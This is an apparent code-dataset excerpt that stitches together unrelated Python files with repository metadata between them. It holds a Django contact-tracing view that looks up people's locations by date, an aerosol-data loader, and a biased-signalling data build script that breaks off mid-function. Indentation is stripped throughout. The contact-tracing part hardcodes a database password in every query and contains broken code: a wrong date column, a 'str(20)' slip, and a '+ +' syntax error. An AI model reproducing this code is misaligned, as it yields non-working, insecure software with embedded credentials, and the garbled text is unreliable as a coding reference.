conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_16 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
if date == "april_16":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_16 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_16= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_17":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_17 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_17= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_18":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_18 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_18= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_19":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_19 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_19= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_20":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_20 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_20= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_21":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_21 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_21= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_22":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_22 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_22= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_23":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_23 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_23= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_24":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_24 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_24= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_25":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_25 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_25= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_26":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_26 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_26= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_27":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_27 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_27= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + " , " + str(y[i][0])
if date == "april_28":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_28 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_28= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0])+ " , "
if date == "april_29":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_29 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_29= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_30":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_20 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_30= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + + str(y[i][0]) + " , "
return render(request, 'TH_results.html',{'stri':stri})
def V_results(request):
person = request.POST["s"]
v = victims.objects.all()
th = Travel_history()
flag=0
for g in v:
if person in g.victim_id:
flag = 1
return render(request, 'AaV.html',)
if flag==0:
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_16, april_17, april_18, april_19, april_20, april_21, april_22, april_23, april_24, april_25, april_26, april_27, april_28, april_29, april_30 from travello_travel_history where person_id = %s ",(person,))
name = cur.fetchall()
A16 = name[0][0]
A17 = name[0][1]
A18 = name[0][2]
A19 = name[0][3]
A20 = name[0][4]
A21 = name[0][5]
A22 = name[0][6]
A23 = name[0][7]
A24 = name[0][8]
A25 = name[0][9]
A26 = name[0][10]
A27 = name[0][11]
A28 = name[0][12]
A29 = name[0][13]
A30 = name[0][14]
dates = ["april_16","april_17","april_18","april_19","april_20","april_21","april_22","april_23","april_24","april_25","april_26","april_27","april_28","april_29","april_30"]
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_16 = %s",(A16,))
y16 = cur.fetchall()
str16 = "On this day this person was at " + str(A16) + " The now victims who had visited this place are : "
for i in range(0,len(y16)-1):
str16 = str16 + str(y16[i][0]) + " , "
th.april_16 = str16
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_17 = %s",(A17,))
y17 = cur.fetchall()
str17 = "On this day this person was at " + str(A17) + " The now victims who had visited this place are : "
for i in range(0,len(y17)-1):
str17 = str17 + str(y17[i][0]) + " , "
th.april_17 = str17
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_18 = %s",(A18,))
y18 = cur.fetchall()
str18 = "On this day this person was at " + str(A18) + " The now victims who had visited this place are : "
for i in range(0,len(y18)-1):
str18 = str18 + str(y18[i][0]) + " , "
th.april_18 = str18
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_19 = %s",(A19,))
y19 = cur.fetchall()
str19 = "On this day this person was at " + str(A19) + " The now victims who had visited this place are : "
for i in range(0,len(y19)-1):
str19 = str19 + str(y19[i][0]) + " , "
th.april_19 = str19
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_20 = %s",(A20,))
y20 = cur.fetchall()
str20 = "On this day this person was at " + str(20) + " The now victims who had visited this place are : "
for i in range(0,len(y20)-1):
str20 = str20 + str(y20[i][0]) + " , "
th.april_20 = str20
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_21 = %s",(A21,))
y21 = cur.fetchall()
str21 = "On this day this person was at " + str(A21) + " The now victims who had visited this place are : "
for i in range(0,len(y21)-1):
str21 = str21 + str(y21[i][0]) + " , "
th.april_21 = str21
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_22 = %s",(A22,))
y22 = cur.fetchall()
str22 = "On this day this person was at " + str(A22) + " The now victims who had visited this place are : "
for i in range(0,len(y22)-1):
str22 = str22 + str(y22[i][0]) + " , "
th.april_22 = str22
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_23 = %s",(A23,))
y23 = cur.fetchall()
str23 = "On this day this person was at " + str(A23) + " The now victims who had visited this place are : "
for i in range(0,len(y23)-1):
str23 = str23 + str(y23[i][0]) + " , "
th.april_23 = str23
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_24 = %s",(A24,))
y24 = cur.fetchall()
str24 = "On this day this person was at " + str(A24) + " The now victims who had visited this place are : "
for i in range(0,len(y24)-1):
str24 = str24 + str(y24[i][0]) + " , "
th.april_24 = str24
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_25 = %s",(A25,))
y25 = cur.fetchall()
str25 = "On this day this person was at " + str(A25) + " The now victims who had visited this place are : "
for i in range(0,len(y25)-1):
str25 = str25 + str(y25[i][0]) + " , "
th.april_25 = str25
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_26 = %s",(A26,))
y26 = cur.fetchall()
str26 = "On this day this person was at " + str(A26) + " The now victims who had visited this place are : "
for i in range(0,len(y26)-1):
str26 = str26 + str(y26[i][0]) + " , "
th.april_26 = str26
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_27 = %s",(A27,))
y27 = cur.fetchall()
str27 = "On this day this person was at " + str(A27) + " The now victims who had visited this place are : "
for i in range(0,len(y27)-1):
str27 = str27 + str(y27[i][0]) + " , "
th.april_27 = str27
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_28 = %s",(A28,))
y28 = cur.fetchall()
str28 = "On this day this person was at " + str(A28) + " The now victims who had visited this place are : "
for i in range(0,len(y28)-1):
str28 = str28 + str(y28[i][0]) + " , "
th.april_28 = str28
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_29 = %s",(A29,))
y29 = cur.fetchall()
str29 = "On this day this person was at " + str(A29) + " The now victims who had visited this place are : "
for i in range(0,len(y29)-1):
str29 = str29 + str(y29[i][0]) + " , "
th.april_29 = str29
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_30 = %s",(A30,))
y30 = cur.fetchall()
str30 = "On this day this person was at " + str(A30) + " The now victims who had visited this place are : "
for i in range(0,len(y30)-1):
str30 = str30 + str(y30[i][0]) + " , "
th.april_30 = str30
th.person_id = str(len(y16) + len(y17) + len(y18) + len(y19) + len(y20) + len(y21) + len(y22) +len(y23) + len(y24) + len(y25) + len(y26) + len(y27) + len(y28) + len(y29) + len(y30))
return render(request, 'V_results.html',{'th': th})
| 49.686502
| 269
| 0.60361
|
d616e41be0ea8901b26b2beb53e41bbb12ebe211
| 2,314
|
py
|
Python
|
oas_erf/util/eusaar_data/histc_vars.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/util/eusaar_data/histc_vars.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/util/eusaar_data/histc_vars.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
import xarray as xr
from oas_erf.constants import path_eusaar_data
from oas_erf.util.eusaar_data import time_h, station_codes, long_name_var_dic, standard_varlist_histc, \
savepath_histc_vars
from oas_erf.util.eusaar_data.flags import load_gd
from oas_erf.util.practical_functions import make_folders
def load_data_timeseries(station, var):
"""
Load data timeseries for variable
:param station:
:param var:
:return: pandas.Series
"""
dr = path_eusaar_data + '/HISTC/'
fp = dr + station + '_' + var + '.dat'
arr = np.loadtxt(fp)
return pd.Series(arr, index=time_h, name=station)
# %%
def load_var_as_dtframe(var):
"""
Load variable for all stations as dataframe
:param var:
:return:
"""
df_o = pd.DataFrame()
for station in station_codes:
s = load_data_timeseries(station, var)
s_gd = load_gd(station)
df_o[station] = s.where(s_gd)
return df_o
def load_var_as_xarray(var):
"""Loads variable list from HISTC and creates xarray dataarray
with dims station and time
:param var:
:return: xr.DataArray
"""
attrs = dict(
units='cm-3',
)
if var in long_name_var_dic:
attrs['long_name'] = long_name_var_dic[var]
attrs['fancy_name'] = long_name_var_dic[var]
df = load_var_as_dtframe(var)
da = df.to_xarray().to_array(dim='station', name=var)
for att in attrs:
da.attrs[att] = attrs[att]
return da
def load_vars_as_xarray(varl=None):
"""
Loads variable list from HISTC and creates xarray dataset
with dims station and time
:param varl: list of variables
:return:
"""
if varl is None:
varl = standard_varlist_histc
xa_l = []
for var in varl:
xa_l.append(load_var_as_xarray(var))
return xr.merge(xa_l)
def load_and_save_vars_as_xarray():
ds = load_vars_as_xarray()
make_folders(savepath_histc_vars)
ds.to_netcdf(savepath_histc_vars)
return ds
def get_histc_vars_xr():
"""
get histc variables (N30, N50, N100, N250) for all years
:return:
"""
if os.path.isfile(savepath_histc_vars):
return xr.load_dataset(savepath_histc_vars)
else:
return load_and_save_vars_as_xarray()
| 24.617021
| 104
| 0.672861
|
e68642a86744ff463f3b6765ac7a35d2f7eb5afe
| 44,147
|
py
|
Python
|
tools/management/commands/build_bias_data.py
|
AlibekMamyrbekov/protwis
|
b3d477b1982623618d995ab5c7f47c918a70238b
|
[
"Apache-2.0"
] | 3
|
2019-07-29T11:49:38.000Z
|
2021-03-03T10:59:29.000Z
|
tools/management/commands/build_bias_data.py
|
AlibekMamyrbekov/protwis
|
b3d477b1982623618d995ab5c7f47c918a70238b
|
[
"Apache-2.0"
] | 1
|
2021-05-12T14:21:53.000Z
|
2021-05-12T14:21:53.000Z
|
tools/management/commands/build_bias_data.py
|
AlibekMamyrbekov/protwis
|
b3d477b1982623618d995ab5c7f47c918a70238b
|
[
"Apache-2.0"
] | null | null | null |
from decimal import Decimal
import logging
import math
import pandas as pd
import os
from build.management.commands.base_build import Command as BaseBuild
from ligand.models import BiasedExperiment, AnalyzedExperiment, AnalyzedAssay
from django.conf import settings
class Command(BaseBuild):
mylog = logging.getLogger(__name__)
mylog.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')
file_handler = logging.FileHandler('biasDataTest.log')
file_handler.setLevel(logging.ERROR)
file_handler.setFormatter(formatter)
mylog.addHandler(file_handler)
structure_data_dir = os.sep.join(
[settings.DATA_DIR, 'ligand_data', 'gproteins'])
cell_structure_data_dir = os.sep.join(
[settings.DATA_DIR, 'ligand_data', 'cell_line'])
help = 'Reads bias data and imports it'
gprot_cache = dict()
cell_cache = dict()
def add_arguments(self, parser):
parser.add_argument('-u', '--purge',
action='store_true',
dest='purge',
default=False,
help='Purge existing bias records')
def handle(self, *args, **options):
# delete any existing structure data
if options['purge']:
try:
print('Started purging bias data')
Command.purge_bias_data()
print('Ended purging bias data')
except Exception as msg:
print(msg)
print('CREATING BIAS DATA')
self.build_bias_data()
self.logger.info('COMPLETED CREATING BIAS DATA')
@staticmethod
def purge_bias_data():
delete_bias_experiment = AnalyzedExperiment.objects.all()
delete_bias_experiment.delete()
@staticmethod
def process_gproteins_excel():
source_file_path = None
filenames = os.listdir(Command.structure_data_dir)
for source_file in filenames:
source_file_path = os.sep.join(
[Command.structure_data_dir, source_file]).replace('//', '/')
print(source_file, source_file_path)
df = pd.read_excel(source_file_path)
Command.gprot_cache = df.set_index('UniProt').T.to_dict('dict')
@staticmethod
def process_cell_line_excel():
source_file_path = None
filenames = os.listdir(Command.cell_structure_data_dir)
for source_file in filenames:
source_file_path = os.sep.join(
[Command.cell_structure_data_dir, source_file]).replace('//', '/')
print(source_file, source_file_path)
df = pd.read_excel(source_file_path)
Command.cell_cache = df.set_index("Cell_line_name").T.to_dict('dict')
def build_bias_data(self):
print('stage # 1, process excell with g_proteins')
Command.process_gproteins_excel()
Command.process_cell_line_excel()
print('Build bias data gproteins')
context = dict()
content = Command.get_data_from_model()
print('stage # 2 : Getting data finished, data points: ', len(content))
# import pdb; pdb.set_trace()
content_with_children = Command.process_data(content)
print('stage # 3: Processing children in queryset finished',
len(content_with_children))
# import pdb; pdb.set_trace()
changed_data = Command.queryset_to_dict(content_with_children)
print('stage # 4: Converting queryset into dict finished', len(changed_data))
# import pdb; pdb.set_trace()
send = Command.combine_unique(changed_data)
print('stage # 5: Selecting endogenous ligands finished')
# import pdb; pdb.set_trace()
referenced_assay = Command.process_referenced_assays(send)
print('stage # 6: Separating reference assays is finished',
Command._reference_assay_counter)
# import pdb; pdb.set_trace()
ligand_data = Command.separate_ligands(referenced_assay, 'inferred')
# TODO: save for on the fly calculations
print('stage # 7: Separate ligands finished')
# import pdb; pdb.set_trace()
limit_family = Command.process_signalling_proteins(
ligand_data, 'inferred')
print('stage # 8: process_signalling_proteins finished', len(limit_family))
# import pdb; pdb.set_trace()
calculated_assay = Command.process_calculation(limit_family)
# import pdb; pdb.set_trace()
print('stage # 9: Calucating finished')
Command.count_publications(calculated_assay)
# import pdb; pdb.set_trace()
print('stage # 10: labs and publications counted')
context.update({'data': calculated_assay})
# import pdb; pdb.set_trace()
print('stage # 11: combining data into common dict is finished')
# save dataset to model
Command.save_data_to_model(context, 'different_family')
print('stage # 12: saving data to model is finished')
print('\nStarted processing subtypes')
ligand_data = Command.separate_ligands(referenced_assay, 'subtypes')
# subtypes part
print('stage # 13: Separate ligands finished')
limit_family = Command.process_signalling_proteins(
ligand_data, 'subtypes')
# import pdb; pdb.set_trace()
print('stage # 14: process_signalling_proteins finished', len(limit_family))
calculated_assay = Command.process_calculation(limit_family)
# import pdb; pdb.set_trace()
print('stage # 15: Calucating finished')
Command.count_publications(calculated_assay)
# import pdb; pdb.set_trace()
print('stage # 16: labs and publications counted')
context.update({'data': calculated_assay})
# import pdb; pdb.set_trace()
print('stage # 17: combining data into common dict is finished')
# save dataset to model
Command.save_data_to_model(context, 'sub_different_family')
print('stage # 18: saving data to model is finished')
@staticmethod
def get_data_from_model():
try:
content = BiasedExperiment.objects.all().prefetch_related(
'experiment_data', 'ligand', 'receptor', 'publication', 'publication__web_link', 'experiment_data__emax_ligand_reference',
).order_by('publication', 'receptor', 'ligand')
except BiasedExperiment.DoesNotExist:
content = None
return content
@staticmethod
def process_data(content):
rd = []
counter = 0
for instance in enumerate(content):
temp_obj = []
fin_obj = {}
fin_obj['main'] = (instance[1])
vendor_counter = 0
for i in instance[1].experiment_data_vendors.all():
vendor_counter = vendor_counter + 1
for entry in instance[1].experiment_data.all():
author_list = list()
for author in entry.experiment_data_authors.all():
author_list.append(author.author)
temp_obj.append(entry)
counter += 1
fin_obj['authors'] = author_list
fin_obj['children'] = temp_obj
fin_obj['vendor_counter'] = vendor_counter
rd.append(fin_obj)
return rd
@staticmethod
def process_g_protein(protein, receptor):
receptor_name = receptor.entry_name.split('_')[0].upper()
if receptor_name in Command.gprot_cache:
protein = Command.gprot_cache[receptor_name]["1'Gfam"]
return protein
@staticmethod
def process_cell_line(cell_line):
if cell_line in Command.cell_cache:
_species = Command.cell_cache[cell_line]["Species"]
_tissue = Command.cell_cache[cell_line]["Tissue/organ"]
else:
_species = cell_line
_tissue = cell_line
return _species, _tissue
@staticmethod
def queryset_to_dict(results):
'''
Merge bias experminet data with assay data
'''
send = list()
for j in results:
temp_dict = dict()
temp = dict()
temp['reference'] = list()
temp['assay'] = dict()
temp['ref_ligand_experiment'] = dict()
doubles = []
temp['publication'] = j['main'].publication
temp['species'] = j['main'].receptor.species.common_name
temp['ligand'] = j['main'].ligand
temp['endogenous_ligand'] = j['main'].endogenous_ligand
temp['auxiliary_protein'] = j['main'].auxiliary_protein
temp['receptor'] = j['main'].receptor
temp['receptor_isoform'] = j['main'].receptor_isoform
temp['receptor_gtpo'] = j['main'].receptor_gtpo
temp['vendor_counter'] = j['vendor_counter']
temp['authors'] = j['authors']
temp['article_quantity'] = 0
temp['labs_quantity'] = 0
if j['children']:
temp_dict = Command.process_children_from_queryset(
j, temp['receptor'])
if temp_dict is not None:
doubles.append(temp_dict)
temp['assay'] = doubles
send.append(temp)
return send
@staticmethod
def process_children_from_queryset(j, receptor):
temp_dict = dict()
temp_dict['assay_initial'] = j['children'][0]
temp_dict['ligand_source_id'] = j['main'].ligand_source_id
temp_dict['ligand_source_type'] = j['main'].ligand_source_type
temp_dict['potency'] = None
temp_dict['pathway_level'] = j['children'][0].pathway_level
temp_dict['delta_relative_transduction_coef'] = None
temp_dict['log_bias_factor'] = None
temp_dict['delta_emax_ec50'] = None
temp_dict['calculated_relative_tau'] = None
temp_dict['order_no'] = 0
temp_dict['endogenous_assay'] = dict() # shall be only one
temp_dict['signalling_protein'] = j['children'][0].signalling_protein
temp_dict['cell_line'] = j['children'][0].cell_line
temp_dict['_tissue'], temp_dict['_species'] = Command.process_cell_line(
temp_dict['cell_line'])
temp_dict['family'] = j['children'][0].family
if temp_dict['family'] == 'G protein':
temp_dict['family'] = Command.process_g_protein(
temp_dict['family'], receptor)
if temp_dict['family'] == 'Gq/11 or Gi/o':
temp_dict['family'] = 'Gq/11'
temp_dict['measured_biological_process'] = j['children'][0].measured_biological_process
temp_dict['assay_type'] = j['children'][0].assay_type
temp_dict['assay_time_resolved'] = j['children'][0].assay_time_resolved
temp_dict['signal_detection_tecnique'] = j['children'][0].signal_detection_tecnique
temp_dict['molecule_1'] = j['children'][0].molecule_1
temp_dict['molecule_2'] = j['children'][0].molecule_2
temp_dict['quantitive_activity'] = j['children'][0].quantitive_activity
temp_dict['quantitive_activity_initial'] = j['children'][0].quantitive_activity
temp_dict['qualitative_activity'] = j['children'][0].qualitative_activity
temp_dict['quantitive_unit'] = j['children'][0].quantitive_unit
temp_dict['quantitive_efficacy'] = j['children'][0].quantitive_efficacy
temp_dict['efficacy_unit'] = j['children'][0].efficacy_unit
